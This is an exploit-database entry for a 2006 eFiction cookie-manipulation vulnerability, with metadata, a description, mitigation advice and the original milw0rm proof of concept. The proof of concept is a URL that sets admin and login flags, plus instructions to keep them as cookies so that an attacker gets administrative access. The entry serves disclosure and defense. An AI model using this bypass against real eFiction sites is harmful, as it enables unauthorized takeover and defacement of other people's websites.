eFiction vulnerability

vendor:

eFiction

by:

milw0rm.com

7,5

CVSS

HIGH

Cookie Manipulation

384

CWE

Product Name: eFiction

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

This vulnerability allows an attacker to gain administrative access to the eFiction website by manipulating the cookies. The attacker can use the Firefox extension 'Add n Edit Cookies' to add the cookies to the browser so that they stick with each page.

Mitigation:

The website should be configured to use secure cookies and the cookies should be validated on the server side.

Source

Exploit-DB raw data:

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing 
these websites under MY name, which is a shame because they ripped it from a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone, 
nor act in this type of activity. I suggest whomever is defacing websites under my name stop, 
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to your cookies so they stick. 
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)

# milw0rm.com [2006-08-25]